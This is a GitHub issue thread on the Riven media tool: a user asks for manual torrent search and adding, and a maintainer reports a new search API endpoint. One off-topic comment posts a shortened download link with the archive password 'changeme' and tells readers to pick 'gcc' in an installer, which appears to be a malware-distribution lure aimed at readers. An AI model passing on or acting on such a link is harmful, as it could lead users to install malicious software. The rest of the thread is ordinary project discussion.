### ISSUE TITLE
Manual scraping and adding?

### ISSUE THREAD

**Issue by MisterC925** [rivenmedia/riven#669]
Sometimes the automagic scraping and indexing can miss wanted downloads (if, for example, a title has "&" and the torrent has "and") 

Back in the dark days of plex_debrid you could manually search the indexers.

I realize that's more complicated now since Riven does the (much needed) job of building proper symlinks/etc, but a way to search and add manually would be a great addition imo

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by dreulavelle** [comment]
I've added a new endpoint that can let you search using Riven's API. Still working on the "addition" part of the puzzle. :)
